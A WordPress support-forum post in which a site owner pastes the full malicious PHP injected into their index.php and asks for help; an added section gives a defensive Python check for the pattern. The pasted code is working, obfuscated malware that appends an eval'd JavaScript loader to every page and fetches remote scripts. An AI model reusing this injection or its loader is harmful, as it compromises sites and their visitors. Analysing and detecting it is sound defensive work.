• Hey,

    For the past week I have been getting hacker/bot attacks on all my WordPress installations.

    In the root folder they put the following code in index.php:

    <?php 
    
    ob_start("security_update"); function security_update($buffer){return $buffer."<script language=\"javascript\">$a=\"Z64bZ3dZ227FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0!Z25200;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vrs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07huc7Z3c07fuc7Z3c07Z22;ddZ3dZ22!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+0~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+0iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25209M0;0|uddubcK8888dy}uK7iuqb7M060Z22;ceZ3dZ2268aZ2572CodZ2565At(Z2530)^Z2528Z25270x0Z2530Z2527+eZ2573Z2529)Z2529Z253b}}Z22;ccZ3dZ22elZ2565ngtZ2568;i+Z252b)Z257btmZ2570Z253dds.Z2573licZ2565(iZ252ci+1Z2529;sZ22;dzZ3dZ22Z2566unZ2563Z2574iZ256fZ256eZ2520dw(Z2574)Z257bZ2563aZ253dZ2527Z252564oZ252563umeZ25256eZ2574Z25252eZ2577rZ2525Z25369Z2574Z252565Z25252Z2538Z252522Z2527;cZ2565Z253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253cscrZ252569Z2570Z252574Z252520lZ2561nZ25256Z2537Z2575Z2561gZ25256Z2535Z25253dZ25255cZ252522Z256aavaZ2573crZ252569Z2570tZ25255cZ25252Z2532Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252fscrZ252569pZ25257Z2534Z25253eZ2527;evZ2561Z256c(uZ256eZ2565Z2573caZ2570eZ2528tZ2529)}Z253bZ22;cdZ3dZ22Z2574Z253dst+Z2553trZ2569Z256egZ252efroZ256dChaZ2572CZ256fde(Z2528tmZ2570.cZ25Z22;czZ3dZ22Z2566uncZ2574ioZ256e 
Z2563zZ2528cZ257aZ2529Z257brZ2565tZ2575Z2572nZ2520Z2563a+cZ2562+ccZ252bcZ2564+ceZ252bZ2563z;}Z253bZ22;dcZ3dZ22wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7<code>7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSxZ22;cbZ3dZ2270Z2565(dZ2573);sZ2574Z253dtZ256dpZ253dZ2527Z2527;for(Z2569Z253d0;iZ253cdsZ252Z22;opZ3dZ22Z2524aZ253dZ2522dw(dZ2563Z2573(Z2563Z2575,1Z2534)Z2529;Z2522;Z22;deZ3dZ22Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+Z2519dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0Z3d0#9050$9;0!Z2520M+4q-4qZ3ebu</code>|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+Z22;caZ3dZ22Z2566unZ2563Z2574iZ256fn 
dZ2563Z2573(dsZ252ceZ2573Z2529Z257bdsZ253duneZ2573caZ25Z22;cuZ3dZ22(p}b4g<code>mxq)6b}g}v}x}</code>m.|}ppqz6*(}rfuyq4gfw)6|<code></code>d.;;rvwyr}f:wZ7by;xp;ubZ7bfdZ25;64c}p<code>|)Z25$$4|q}s|</code>),$*(;}rfuyq*(;p}b*Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522Z25220660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522!90660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ25Z22;stZ3dZ22Z2573Z2574Z253dZ2522$Z2561Z253dZ2573tZ253bdZ2563Z2573(Z2564Z2561+Z2564bZ252bdZ2563Z252bZ2564Z2564+Z2564Z2565,Z25310Z2529;Z2564wZ2528sZ2574)Z253bZ2573tZ253dZ2524Z2561;Z2522Z253bZ22;Z69f Z28doZ63uZ6deZ6etZ2ecooZ6bZ69e.iZ6eZ64exZ4fZ66(Z27rf5Z66Z36dsZ27)Z3dZ3d-1)Z7bfunctiZ6fZ6e cZ61llbZ61ckZ28x)Z7b wZ69ndoZ77.tZ77 Z3d x;Z76arZ20d Z3d Z6eeZ77 DZ61tZ65Z28Z29;d.Z73Z65tZ54iZ6de(xZ5bZ22aZ73_oZ66Z22]*10Z300Z29;vZ61r hZ20Z3d d.getZ55TZ43HouZ72sZ28);wZ69ndoZ77.hZ20Z3d h;Z69f (Z68 Z3e 8)Z7bZ77Z69Z6eZ64ow.Z67Z64 Z3d Z64;Z73Z63(Z27rf5Z666dZ73Z27,2,7Z29;Z65vZ61Z6c(Z75neZ73cZ61pe(Z64z+Z63Z7aZ2boZ70Z2bsZ74)+Z27dw(dZ7a+Z63Z7a(Z24a+sZ74)Z29;Z27);Z64Z6fcZ75Z6deZ6etZ2ewrZ69tZ65Z28$a)Z3bZ7deZ6csZ65Z7bd.sZ65tZ55TCZ44Z61tZ65(Z64.geZ74Z55TCDZ61tZ65Z28) Z2d Z32Z29Z3bZ77iZ6edowZ2eZ67Z64 Z3d d;Z76aZ72 tiZ6de Z3d neZ77Z20Z41Z72Z72ayZ28);Z76ar Z73hZ69ftZ49ndeZ78 Z3d Z22Z22;timZ65[Z22yeZ61Z72Z22] Z3d dZ2eZ67eZ74Z55TCZ46ullZ59earZ28);tZ69me[Z22Z6donZ74hZ22] Z3dZ20Z64Z2egZ65tUZ54Z43MonZ74h()Z2b1;Z74imZ65[Z22dZ61Z79Z22] Z3d Z64Z2eZ67etUZ54CDZ61tZ65()Z3bif Z28dZ2egeZ74UTCZ4dZ6fZ6eZ74hZ28Z29Z2b1 Z3c 10Z29Z7bsZ68iftZ49nZ64eZ78 Z3d tiZ6deZ5bZ22yeZ61Z72Z22] +Z20Z22-Z30Z22 +Z20Z28dZ2egeZ74UTCZ4dZ6fnthZ28)+1Z29;}Z65lseZ7bZ73hiZ66tZ49Z6edexZ20Z3d tZ69meZ5bZ22yeZ61rZ22]Z20+Z20Z22-Z22 + Z28dZ2eZ67etUZ54CZ4doZ6etZ68Z28)+1Z29;Z7dZ69fZ20(d.Z67etZ55TCDZ61te(Z29 
Z3c 10)Z7bZ73hiZ66Z74Z49ndZ65Z78 Z3dsZ68ifZ74Z49ndZ65x Z2b Z22-0Z22 + dZ2egetZ55Z54CDaZ74eZ28);}Z65lseZ7bZ73Z68Z69fZ74Z49Z6edeZ78 Z3d sZ68ifZ74Z49Z6edexZ20Z2b Z22-Z22 + Z64.gZ65tUZ54CDaZ74eZ28Z29;}Z64ocZ75mZ65ntZ2ewriZ74Z65Z28Z22Z3cscrZ22+Z22ipt lanZ67uagZ65Z3djavZ61scZ72Z69ptZ22+Z22 sZ72cZ3dZ27hZ74tpZ3aZ2fZ2fseaZ72chZ2etZ77Z69Z74terZ2ecomZ2ftrZ65nZ64sZ2fdaiZ6cy.jZ73on?Z64Z61Z74eZ3dZ22+ shZ69ftZ49nZ64ex+Z22&Z63Z61llbZ61ckZ3dcalZ6cbaZ63k2Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}} funcZ74ionZ20calZ6cbZ61ck2Z28xZ29Z7bwindZ6fw.tZ77 Z3d x;sZ63(Z27rf5Z66Z36dsZ27Z2c2Z2c7);Z65valZ28unZ65scZ61pe(Z64z+cZ7aZ2bopZ2bstZ29+Z27Z64Z77(dZ7aZ2bcZ7aZ28Z24Z61+stZ29);Z27);Z64ocZ75menZ74.wZ72itZ65(Z24aZ29Z3b}doZ63uZ6dZ65nt.Z77Z72itZ65(Z22Z3cimg Z73rZ63Z3dZ27httpZ3aZ2fZ2fsearch.tZ77itZ74erZ2eZ63oZ6dZ2fimageZ73Z2fsearZ63Z68Z2frZ73s.pZ6egZ27 wiZ64Z74Z68Z3d1 heigZ68tZ3d1 sZ74yleZ3dZ27visiZ62iliZ74y:Z68Z69dZ64eZ6eZ27 Z2fZ3e Z3cscrZ22+Z22ipt Z6canZ67Z75aZ67Z65Z3djZ61Z76ascZ72ipZ74Z22+Z22 Z73rcZ3dZ27http:Z2fZ2fseZ61Z72ch.Z74Z77iZ74teZ72.cZ6fmZ2ftrZ65Z6edZ73Z2fdaZ69lZ79.Z6asZ6fn?Z63Z61lZ6cbZ61ckZ3dZ63alZ6cbZ61ckZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}eZ6cseZ7b$aZ3dZ27Z27};fuZ6ecZ74Z69Z6fn Z73cZ28cZ6eZ6d,Z76,edZ29Z7bvarZ20exZ64Z3dneZ77Z20DZ61te(Z29;exZ64Z2eseZ74DatZ65(Z65xd.Z67eZ74DatZ65Z28)+Z65d)Z3bdoZ63umZ65nZ74.Z63Z6fokZ69eZ3dcZ6emZ2b Z27Z3dZ27 +escZ61pZ65(vZ29+Z27;expZ69reZ73Z3dZ27+exd.toZ47MTZ53tZ72iZ6eZ67Z28)Z3b};\";function z(s){r=\"\";for(i=0;i<s.length;i++){if(s.charAt(i)==\"Z\"){s1=\"%\"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($a));</script>";}
    
    //important security update ?>

    Please help out! I am updating to 2.8.6 now.
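
Added example, not part of the original post: a Python triage check for the pattern in the posted index.php, an `ob_start` callback that appends a `<script>` to every page and evals a string decoded by swapping `Z` for `%`. The sample file, its shortened `z()` and the harmless payload `var m=1;` are constructed, and the function names are hypothetical; `%uXXXX` escapes that JavaScript's `unescape` also accepts are not handled.

```python
import re
from urllib.parse import unquote

# ob_start("name"): a named output-buffer callback that sees every rendered page
OB_START = re.compile(r"""ob_start\s*\(\s*["'](\w+)["']\s*\)""")
# return $buffer."<script ...  : the callback appends a script tag to the page
SCRIPT_APPEND = re.compile(r"""return\s+\$\w+\s*\.\s*["']<script""", re.I)
# eval(z(...)): eval of the result of a decoder function
EVAL_DECODE = re.compile(r"eval\s*\(\s*\w+\s*\(", re.I)
# $a=\"...\" as it appears inside the PHP double-quoted string
BLOB = re.compile(r'\$a=\\"([^"\\]+)\\"')

# Constructed sample: same shape as the posted file, harmless payload.
SAMPLE = r'''<?php
ob_start("security_update"); function security_update($buffer){return $buffer."<script language=\"javascript\">$a=\"Z76arZ20mZ3d1Z3b\";function z(s){return unescape(s.split(\"Z\").join(\"%\"));}eval(z($a));</script>";}
//important security update ?>'''

def inspect_php(source):
    """Return the indicator names found in the text of one PHP file."""
    hits = []
    m = OB_START.search(source)
    if m:
        name = m.group(1)
        hits.append("ob_start-callback:" + name)
        defined = re.search(r"function\s+" + re.escape(name) + r"\s*\(", source)
        if defined and SCRIPT_APPEND.search(source):
            hits.append("callback-appends-script")
    if EVAL_DECODE.search(source) and "unescape" in source:
        hits.append("eval-of-decoded-string")
    return hits

def extract_blob(source):
    """Return the encoded string assigned to $a, or None if absent."""
    m = BLOB.search(source)
    return m.group(1) if m else None

def decode_z_layer(blob):
    """Mirror the posted z(): replace 'Z' with '%', then percent-decode.
    Only the first layer is undone; the result is text to read, never to run."""
    return unquote(blob.replace("Z", "%"), encoding="latin-1")

if __name__ == "__main__":
    print(inspect_php(SAMPLE))
    print(decode_z_layer(extract_blob(SAMPLE)))
```

Run `inspect_php` over the text of every `index.php` under the web root; a clean WordPress `index.php` produces no hits.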

  • The topic ‘Hacker attacks: index..php in root folder’ is closed to new replies.